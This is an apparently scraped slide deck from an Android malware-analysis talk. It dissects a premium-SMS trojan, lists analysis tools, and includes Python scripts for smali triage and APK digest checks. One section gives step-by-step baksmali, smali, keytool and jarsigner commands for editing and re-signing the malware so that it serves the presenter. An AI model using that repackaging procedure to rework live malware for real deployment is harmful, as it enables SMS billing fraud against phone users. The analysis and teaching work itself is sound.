I haz you and pwn your maal

      Harsimran Walia
#WhoamI
• Research Scientist @ McAfee
• Expertise: Malware Analysis, Exploit
  development and Vulnerability Analysis
• Twitter: b44nz0r
• Email: walia.harsimran@gmail.com
• Previous papers: Reversing Microsoft Patches
  to Reveal Vulnerable Code @ NullCon 2012
Disclaimer
• The research and views presented here are
  solely mine and have nothing to do with any of the
  current or previous organizations I work for
  or am associated with in any form
• The presentation is for educational purposes
  only and no one can be held responsible for
  any harm caused in any form due to use or
  misuse of the information presented here
Access Data?
•   Use of smartphones, tablets, mobile devices
•   No longer need to stay in one place
•   Information on the go
•   But,
Danger!
•   Create a larger attack vector
•   Treasure trove for attackers
•   Hot targets for attackers and data thieves
•   Ease of attack
•   Vast amount of information
Attacks
• Most reliable attack is via malware
• Malware can
  1.   penetrate a host
  2.   extract information
  3.   stay hidden
  4.   send data to the attacker
• Attackers created smartphone malware
• Delivered as smartphone applications
Platforms
• Many smartphone platforms
  – Apple’s iOS
  – Android
  – Symbian
  – Blackberry
• Android by far most popular with attackers
Why Android?
• 50.1% share of smartphone users in the US
Why Android?
• 61% share of smartphone sales in Q1 2012
Why Android?
• Starting development of iPhone OS apps needs
  – Mac computer
  – Sign in to the Dev Program
  – Wait for verification
  – Pay fees
Why Android?
• Not only in user share: sales are also well above
  any other platform
• Huge user base i.e. victims ;)
• Ease of malware development and hosting on
  Google Play
• These have led to:
Headlines
•   Android OS the “worst platform for malware” - TG Daily, August 2011
•   Android threats leapt 76% during Q2 2011 - McAfee
•   Most attacked mobile OS, overtaking Symbian OS
•   The most popular target for mobile malware developers
•   Increasing target for cybercriminals
Malware Analysis
Windows vs Android
• Windows: 2 methods, dynamic and static
  Android: same, dynamic and static
• Windows: a virtual machine or sandbox is used
  Android: a virtual machine with the Android SDK
• Windows: static analysis means reverse engineering the
  application/malware using tools and techniques to
  re-create the actual code and algorithm
  Android: in many cases static analysis reveals the malware
  behavior and very little dynamic analysis is required
• Windows: have to debug through assembly code to
  understand the algorithm
  Android: can be decompiled into readable Java code
What to expect?
• Lab setup, a VM with android SDK
  installation.
• Tools required for the analysis
• Static Analysis
• Dynamic Analysis
• Patching the malware to own it
What not to expect?
• How to write an android malware
• How to spread it
• How to hack Android
Behavioral classification
Types of Android Malware
• Mobile Device Data Stealers
  – most common
  – aim to acquire different info from the infected
    device
      • OS version
      • product ID
      • International Mobile Equipment Identity (IMEI)
        number
      • International Mobile Subscriber Identity (IMSI)
        number
   – This stolen device info is encrypted and sent via
     HTTP POST to the attacker and can be used for future
     attacks.
• Rooting-capable
   – malware that infects the device to gain so-called root
     privileges
   – gives remote users access to files and the device's
     flash memory
   – with root, the malware drops copies of
     itself onto the flash memory
   – so it can't be detected, and consequently
     deleted, by antivirus products
• Premium Service Abusers
   – hard-coded, predetermined premium numbers
   – send text messages to them
   – affected users are charged for the SMS services

• Mobile Device Spies
   – secretly monitor info stored on infected devices
      • GPS location
      • save text and email messages
      • Like data stealers, sends stolen data to specific URLs via HTTP
        POST.
      • focus more on gathering personal data
One-click Billing Fraud
Android One-click Billing Fraud
• Mostly active on p0rn and gamer video sites
• Trying to view a video triggers a pop-up asking the user to
  download a malicious app.
• Gets the Android user account information, and sends them to
  the cybercriminals.
• Displays a pop-up showing the message
    – “We haven’t received your payment. Therefore, based on our policy,
      we will have to charge you if you have not paid yet.”
• Also displays the information it stole in order to build credibility
  for itself and better convince the victim to pay the amount.
• The pop-up is set to show every few minutes and keeps eating
  your money.
WHY DID I WRITE MY PAPER?
• Malware Analysis,
   – important part of antimalware companies’ work.
• Mobile malware analysis is now equally important.
• Effective analysis can be used by law enforcement
  agencies to catch law breakers
   – i.e. malware authors and attackers
• For fun, when you can pwn someone else’s malware
  and control it.
• You get yourself full-blown malware without writing it.
ANDROID MAL-ANALYSIS
   TOOLS OF TRADE
Tools - Static analysis
•   Mobile Sandbox: provides static analysis of malware images

•   IDA pro: Supports Android bytecode in version 6.1 and later

•   APKInspector: Powerful GUI tool for analyzing Android applications.

•   Dex2jar: For converting Android’s .dex format to Java’s .class format

•   Jd-gui: A standalone graphical utility that displays Java source codes of .class files.

•   Androguard: Reverse engineering and Malware analysis of Android applications.

•   JAD: Java Decompiler

•   Dexdump: Java .dex file format decompiler

•   Smali: smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM
    implementation.
Tools – Dynamic analysis
• Droidbox: An Android Application Sandbox for Dynamic
  Analysis

• The Android SDK: “A software development kit that enables
  developers to create applications for the Android platform.”
  Using the Android SDK we can create a virtual Android device
  almost identical in functionality and capabilities to an Android
  telephone; using that virtual device as a secure environment
  we can execute the malware and observe its behaviour.

• AndroidAuditTools: Dynamic Android analysis tools
LAB SETUP
•   Traditional malware analysis includes a Virtual Machine
•   We need one as well
•   Android SDK installed in the VM
•   Well documented installation details can be found here:
    http://developer.android.com/sdk/installing.html
• Would highlight one thing during installation
• Must select at least one
  version of the API
• API versions are used to develop
  applications for different
  Android versions
• A separate SDK API version is needed for
  malware targeting a
  particular Android version
• Demo
   – android 2.3 (gingerbread)
ANALYSIS
Android Malware Acquisition
• Contagio MiniDump
       (http://contagiominidump.blogspot.in/)
• Community driven
• Anyone can submit a sample
• It is made available to others
• Demo
  – Voodoo SimpleCarrierIQDetector
  – supposed to detect presence of the Carrier IQ mobile
    diagnostic software on the system
  – Chosen based on the ease of understanding
STATIC ANALYSIS
Mobile-sandbox.com
• Submit the apk to mobile-sandbox.com for analysis
• Report generated can be viewed at
  http://mobilesandbox.org/xml_report_static/?q=176
• Important information from report

   Requested Permissions from Android Manifest:   android.permission.READ_LOGS
                                                  android.permission.SEND_SMS




                                                  sendSMS
   Potentially dangerous Calls:                   Execution of native code
                                                  getPackageInfo
Extraction
•   Start our manual analysis
•   Need to extract the apk to get its contents
•   An apk file is a zip-formatted package
•   Extraction done with WinRAR or WinZip
•   File of interest is classes.dex
dex2jar
• C:> dex2jar.bat classes.dex
  – Output: classes.dex -> classes_dex2jar.jar
• Converts the classes.dex file extracted from the
  apk to a jar file
JD-GUI
• To read the code from the .class file in the jar
• Open the jar file with JD-GUI
• Four .class files
   – Detect.class
       • Code is trying to make out if CarrierIQ software is installed on the
         system, based on some checks.
   – R.class
       • Every Android application contains this class file. Here it is used to
         declare a few variables.
   – Utils.class
       • Contains a few utility method definitions like findFiles,
         getCommandOutput, etc.
   – Main.class
       • This is the most interesting class as it actually contains the malicious
         code.
       • The code looks like this
Code Analysis
• Four identical commands to send an SMS to the number
  “81168” with four different SMS texts
   –   AT37
   –   MC49
   –   SP99
   –   SP93
• A Google search on the number shows that it is a
  premium-rate SMS number that costs almost € 9/SMS
• This is how hackers make money with mobile malware
• Some malware listens for incoming messages
• Deletes them even before a user can read them, if
  they are from the service provider and
  would inform users about their balance or
  billing charges.
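As an added example (not code from the slides), the Python triage script below automates what the Code Analysis slide does by eye on the decompiled code: it scans baksmali output for SmsManager.sendTextMessage() calls, recovers the destination number and message text from the preceding const-string instructions, and groups the messages aimed at short codes, the usual shape of premium-rate services. The smali input is constructed to mirror the slides' findings (four texts to “81168” plus one ordinary message); the register layout of the call is an assumption.

```python
"""Triage baksmali output for SmsManager.sendTextMessage() calls.

Added example, not code from the slides: a linear scan over .smali text that
tracks which string each register last received (const-string) and, at every
sendTextMessage call, reports the destination number and message text, then
groups the messages sent to short codes. The sample smali below is constructed
to mirror the slides' findings; its register layout is an assumption.
"""
import re
from typing import Dict, List, Optional, Tuple

SEND_TEXT_SIG = (
    "Landroid/telephony/SmsManager;->sendTextMessage("
    "Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;"
    "Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V"
)

# Constructed sample in the shape of baksmali output. Register layout assumed:
# v0 = SmsManager, v1 = destination, v2 = service centre (null), v3 = text,
# v4/v5 = PendingIntents (null). The fifth call is an ordinary message so the
# short-code filter has something to reject.
SAMPLE_SMALI = "\n".join([
    ".method private sendAll()V",
    "    .locals 6",
    "    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;",
    "    move-result-object v0",
    '    const-string v1, "81168"',
    "    const/4 v2, 0x0",
    "    const/4 v4, 0x0",
    "    const/4 v5, 0x0",
    '    const-string v3, "AT37"',
    "    invoke-virtual {v0, v1, v2, v3, v4, v5}, " + SEND_TEXT_SIG,
    '    const-string v3, "MC49"',
    "    invoke-virtual {v0, v1, v2, v3, v4, v5}, " + SEND_TEXT_SIG,
    '    const-string v3, "SP99"',
    "    invoke-virtual {v0, v1, v2, v3, v4, v5}, " + SEND_TEXT_SIG,
    '    const-string v3, "SP93"',
    "    invoke-virtual/range {v0 .. v5}, " + SEND_TEXT_SIG,
    '    const-string v1, "+15555550100"',
    '    const-string v3, "status: ok"',
    "    invoke-virtual {v0, v1, v2, v3, v4, v5}, " + SEND_TEXT_SIG,
    "    return-void",
    ".end method",
])

CONST_STR = re.compile(r'^\s*const-string(?:/jumbo)?\s+([vp]\d+),\s*"((?:[^"\\]|\\.)*)"')
INVOKE_SEND = re.compile(r"^\s*invoke-(?:virtual|interface)(?:/range)?\s+\{([^}]*)\},\s*"
                         + re.escape(SEND_TEXT_SIG))
# Any instruction whose first operand is a register normally writes it; the
# opcodes below only read that register, so they must not clear our tracking.
WRITES_REG = re.compile(r"^\s*([a-z][a-z0-9/-]*)\s+([vp]\d+)(?:[,\s]|$)")
READ_ONLY_OPCODES = ("if-", "sput", "iput", "aput", "return", "throw", "monitor-",
                     "packed-switch", "sparse-switch", "check-cast", "goto", "fill-array-data")
_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", '"': '"', "\\": "\\", "'": "'"}
SHORT_CODE = re.compile(r"^\d{3,6}$")


def _unescape(s: str) -> str:
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(0)), s)


def _expand_regs(spec: str) -> List[str]:
    """Turn "v0, v1, v2" or the /range form "v0 .. v5" into a register list."""
    spec = spec.strip()
    if " .. " in spec:
        lo, hi = spec.split(" .. ")
        return [f"{lo[0]}{i}" for i in range(int(lo[1:]), int(hi[1:]) + 1)]
    return [r.strip() for r in spec.split(",") if r.strip()]


def extract_sms_calls(smali: str) -> List[Tuple[Optional[str], Optional[str]]]:
    """Return (destination, text) for each sendTextMessage call in the text.

    None means the value was not a string constant set in the same method,
    e.g. a number read from a field or decrypted at runtime.
    """
    regs: Dict[str, str] = {}
    calls: List[Tuple[Optional[str], Optional[str]]] = []
    for line in smali.splitlines():
        m = CONST_STR.match(line)
        if m:
            regs[m.group(1)] = _unescape(m.group(2))
            continue
        m = INVOKE_SEND.match(line)
        if m:
            args = _expand_regs(m.group(1))  # args[0] is the SmsManager receiver
            dest = regs.get(args[1]) if len(args) > 1 else None
            text = regs.get(args[3]) if len(args) > 3 else None
            calls.append((dest, text))
            continue
        m = WRITES_REG.match(line)
        if m and not m.group(1).startswith(READ_ONLY_OPCODES):
            regs.pop(m.group(2), None)  # register overwritten by something else
    return calls


def premium_short_codes(calls) -> Dict[str, List[str]]:
    """Group message texts by destination for 3-6 digit short codes."""
    grouped: Dict[str, List[str]] = {}
    for dest, text in calls:
        if dest and SHORT_CODE.match(dest):
            grouped.setdefault(dest, []).append(text or "")
    return grouped


if __name__ == "__main__":
    found = extract_sms_calls(SAMPLE_SMALI)
    for dest, text in found:
        print(f"sendTextMessage -> {dest!r}: {text!r}")
    print("short codes:", premium_short_codes(found))
```

Run it over the smali-out directory that baksmali produces (one call per file) to get a per-app list of SMS destinations and texts without reading every method; a None in the output is itself a signal, since it means the number or text was not a plain constant and the sample is worth a closer look.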
I haz you
• I know the premium rate phone number
• Know the text message being sent
• If interested in catching the crooks,
  – find the country and the operator whom the number
    belongs to
  – persuade them to disclose the information on the
    attacker/malware author
   – Google helps a lot with substantial information available
     publicly regarding the same
• If you get the police involved, chances of catching
  the hax0r are high
Scam
• On Google I found a funny but very interesting Facebook scam
  around this
• Like other scam Facebook applications,
   – a user gets messages from his friends on Facebook asking him to
     vote for his friend in some “Miss and Mister” contest, giving an
     infected web link
   – Following the link actually hacks the Facebook account, rendering it
     unusable for the user
   – The attacker then calls him/her up, saying that the account has been
     blocked for so-and-so reason
   – Hence he has to send an SMS to the mentioned number “81168”
     with any of the 4 texts
   – He will receive a code that has to be given to the caller (who is the
     hacker) to unlock his Facebook account.
PWNIFICATION
• Finished with the analysis
• Extracted information on the malware author
• Let's own the malware and make it dance to
  our tune
• The following technique explains the process to
  own the malware we just analyzed
  – can be fairly generalized
Baksmali
•   Program used to disassemble dex files
•   Disassembles the .dex file to .smali files
•   Names similar to the .class files
•   Can be opened in any text editor
• C:> java -jar baksmali-0.93.jar -o smali-out classes.dex
• File containing the malicious code
   – main$1.smali
   – From Main.class, figured out in the analysis phase
   – Open in a text editor
• Change the destination number of the SMS
  – i.e. the first argument to the sendTextMessage function
• Set it to your mobile number or any other
• Save the file
• Demo
  – changing it to the port number of my Android
    emulator
Smali
• Used to compile the .smali files back to a .dex file
• After making the desired changes to the smali file
• Save it, then compile all the .smali files together to
  classes.dex using

• C:> java -jar smali-0.93.jar smali-out -o classes.dex
Packing
• Delete the META-INF folder
  –   contains the SHA1 digests of the packaged files, including classes.dex
  –   these will not match the changed classes.dex file
  –   also holds the apk signing information
  –   has to be replaced
• Private key of the original author is not available
• Have to sign the apk with our own private key
• With the modified classes.dex, pack the files back into
  a .zip file using any packer utility
• Change the extension from .zip to .apk
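The Extraction and Packing slides both rest on the same fact: an apk is a zip whose META-INF/MANIFEST.MF records a base64 SHA1 digest of every packaged file, so a classes.dex swapped in without regenerating META-INF no longer matches. The script below is an added example (not code from the slides) that parses that manifest, recomputes each digest from the zip entries and reports mismatches. Both packages are constructed in memory with placeholder contents, not a real dex; the CERT.SF and CERT.RSA files a signed apk also carries are left out.

```python
"""Check an APK's META-INF/MANIFEST.MF digests against the packaged files.

Added example, not code from the slides: the JAR signing scheme that APKs use
records a base64 SHA1 digest of every packaged file in META-INF/MANIFEST.MF.
This script parses that manifest, recomputes each digest from the zip entries
and reports mismatches, which is what happens when classes.dex is swapped but
the old META-INF is left in place. Both packages below are constructed in
memory; the file contents are placeholders, not a real dex.
"""
import base64
import hashlib
import io
import zipfile
from typing import Dict, List, Optional


def sha1_digest_b64(data: bytes) -> str:
    """The digest form used by MANIFEST.MF: base64 of the raw SHA-1."""
    return base64.b64encode(hashlib.sha1(data).digest()).decode("ascii")


def build_manifest(entries: Dict[str, bytes]) -> str:
    """Write a MANIFEST.MF with one Name/SHA1-Digest section per entry."""
    lines = ["Manifest-Version: 1.0", "Created-By: constructed example", ""]
    for name, data in entries.items():
        lines += [f"Name: {name}", f"SHA1-Digest: {sha1_digest_b64(data)}", ""]
    return "\r\n".join(lines) + "\r\n"


def parse_manifest(text: str) -> Dict[str, Dict[str, str]]:
    """Parse MANIFEST.MF into {entry name: {attribute: value}}.

    The main section (no Name attribute) is stored under "". A line starting
    with a single space continues the previous one (manifest lines are
    limited to 72 bytes, so long entry names wrap).
    """
    logical: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]
        else:
            logical.append(raw)
    sections: Dict[str, Dict[str, str]] = {}
    attrs: Dict[str, str] = {}
    for line in logical + [""]:  # the trailing "" flushes the last section
        if line == "":
            if attrs:
                sections[attrs.get("Name", "")] = attrs
            attrs = {}
            continue
        key, _, value = line.partition(":")
        attrs[key.strip()] = value.strip()
    return sections


def verify_digests(apk_bytes: bytes) -> Dict[str, bool]:
    """Return {entry: digest matches} for every file listed in the manifest."""
    result: Dict[str, bool] = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        manifest = parse_manifest(zf.read("META-INF/MANIFEST.MF").decode("utf-8"))
        for name, attrs in manifest.items():
            if name == "" or "SHA1-Digest" not in attrs:
                continue
            try:
                result[name] = sha1_digest_b64(zf.read(name)) == attrs["SHA1-Digest"]
            except KeyError:
                result[name] = False  # listed in the manifest but missing from the zip
    return result


def build_package(entries: Dict[str, bytes], manifest: Optional[str] = None) -> bytes:
    """Zip the entries with a MANIFEST.MF computed from them, or with a supplied
    (possibly stale) manifest to simulate a repack that kept the old META-INF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    manifest if manifest is not None else build_manifest(entries))
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed placeholder contents; a real apk also carries CERT.SF and CERT.RSA.
ORIGINAL_FILES = {
    "AndroidManifest.xml": b"<constructed binary manifest placeholder>",
    "classes.dex": b"dex\n035\x00 constructed original classes.dex",
}
PATCHED_FILES = {**ORIGINAL_FILES,
                 "classes.dex": b"dex\n035\x00 constructed patched classes.dex"}


def demo():
    """Verify an intact package and one whose classes.dex was swapped
    without regenerating META-INF."""
    intact = build_package(ORIGINAL_FILES)
    stale_metainf = build_package(PATCHED_FILES, manifest=build_manifest(ORIGINAL_FILES))
    return verify_digests(intact), verify_digests(stale_metainf)


if __name__ == "__main__":
    ok, bad = demo()
    print("intact package:", ok)
    print("swapped classes.dex, old META-INF:", bad)
```

Once a repacked apk has been re-signed the way the Signing slides describe, its digests are consistent again, so this check passes; what changes is the signing certificate. The defender's comparison is therefore the signer (visible with `jarsigner -verify -verbose -certs`) against the developer's known certificate, which is also why Android refuses to install an update whose signer differs from the app already on the device.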
Signing
• Mandated by Google for an application (apk) to be
  signed with the owner/author's private key
• Cannot be installed on an emulator or a device if it is not
  signed
• Can use self-signed certificates to sign applications
• No certificate authority is needed
• To sign we need,
   – Keytool
   – Jarsigner
Keytool
• Comes as a part of the JDK installation
• Used to create a private key for signing

• C:> keytool -genkey -v -keystore my-personal-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

   – prompts for passwords for the keystore and key
   – and for the Distinguished Name fields
Jarsigner
• Comes as a part of the JDK installation
• Used to sign the apk with the created keystore

• C:> jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore my-release-key.keystore carrieriq.apk alias_name

  – modifies the APK in place
  – creates the META-INF folder with the signing details
  – APK is now signed
• To verify that the apk is signed

• C:> jarsigner -verify -verbose my_carrieriq.apk alias_name

• If signed properly, it outputs “JAR verified”

• Voila!
• Got ourselves a malware
Playing

DYNAMIC ANALYSIS
•   Install the apk (malware) on the Android SDK emulator
•   To verify the behavior that we modified
•   Open two instances of the Android emulator
•   Install the new malware on one of them
•   The modified SMS number should be the port
    number of the emulator that does not have the
    malware installed
• Install and run the app
• As soon as the uninstall button is clicked
• SMS gets sent to the other emulator
I pwn your maal
•   I modified your malware
•   Customized it to my need
•   Now I pwn your maal
•   It will serve me now

• ☺ (evil grin)
CONCLUSION
• Overview of how the Android smartphone OS has
  become the most popular target for attackers
• Describes different types of malware being
  created for the Android platform
• Attempts to explain
  –   the lab setup
  –   tools required
  –   the static and dynamic malware analysis
  –   practically analyzing a real premium-SMS-sending
      malware
• After analysis
  – Origin of the malware is known
  – We know how to own the malware
• In short

      “I haz you and pwn your maal”.
Thanks

Questions??

The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 

Último (20)

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 

I haz you and pwn your maal

  • 1. I haz you and pwn your maal Harsimran Walia
  • 2. #WhoamI • Research Scientist @ McAfee • Expertise: Malware Analysis, Exploit development and Vulnerability Analysis • Twitter: b44nz0r • Email: walia.harsimran@gmail.com • Previous papers: Reversing Microsoft Patches to Reveal Vulnerable code @ NullCon,2012
  • 3. Disclaimer • The research and views presented here are solely mine and nothing to do with any of the current and previous organizations, I work for or associated with in any form • The presentation is for educational purposes only and no one can be held responsible for any harm caused in any form due to use or misuse of information presented here
  • 4. Access Data? • Use of smartphones, tablets, mobile devices • No longer need to stay in one place • Information on the go • But,
  • 5. Danger! • Create a larger attack vector • Treasure trove for attackers • Hot targets for attackers and data thieves • Ease of attack • Vast amount of information
  • 6. Attacks • Most reliable attack is via malware • Malware can 1. penetrate a host 2. extract information 3. stay hidden 4. send data to the attacker • Attackers created smartphone malware • Delivered as smartphone applications
  • 7. Platforms • Many smartphone platform – Apple’s iOS – Android – Symbian – Blackberry • Android by far most popular with attackers
  • 8. Why Android? • 50.1% Smartphone users share in US
  • 9. Why Android? • 61% smartphone sales share in Q1,2012
  • 10. Why Android? Starting development of Iphone OS apps needs • Mac Computer • Sign-in Dev Program • Wait for verification • Pay fees
  • 11. Why Android? • Not only user share, sales are much above any other platform • Huge user base i.e. victims ;) • Ease of malware development and hosting on google play • Have led to:
• Most attacked mobile OS, overtaking Symbian OS
• The most popular target for mobile malware developers
• Increasing target for cybercriminals
Malware Analysis: Windows vs Android
• Windows
  – 2 methods, dynamic and static
  – Virtual machine or sandbox is used
  – Static analysis: reverse engineer the application/malware using tools and techniques to re-create the actual code and algorithm
  – Have to debug through assembly code to understand the algorithm
• Android
  – Same, dynamic and static
  – Virtual machine with the Android SDK
  – In many cases static analysis reveals the malware behavior and very little dynamic analysis is required
  – Can be decompiled into readable Java code
What to expect?
• Lab setup: a VM with an Android SDK installation
• Tools required for the analysis
• Static analysis
• Dynamic analysis
• Patching the malware to own it
What not to expect?
• How to write an Android malware
• How to spread it
• How to hack Android
Types of Android Malware
• Mobile Device Data Stealers
  – most common
  – aim to acquire different info from the infected device
    • OS version
    • product ID
    • International Mobile Equipment Identity (IMEI) number
    • International Mobile Subscriber Identity (IMSI) number
  – The stolen device info is encrypted and sent via HTTP POST to the attacker; it can be used for future attacks
• Rooting-capable
  – the malware infects the device to gain so-called root privileges
  – this gives remote users access to files and the device's flash memory
  – with root, the malware drops copies of itself onto the flash memory (system partition)
  – there it can't be detected, and consequently deleted, by antivirus products that run with ordinary app privileges
• Premium Service Abusers
  – hard-coded, predetermined premium numbers
  – sends text messages
  – affected users are charged for the SMS services
• Mobile Device Spies
  – secretly monitor info stored on infected devices
    • GPS location
    • saved text and email messages
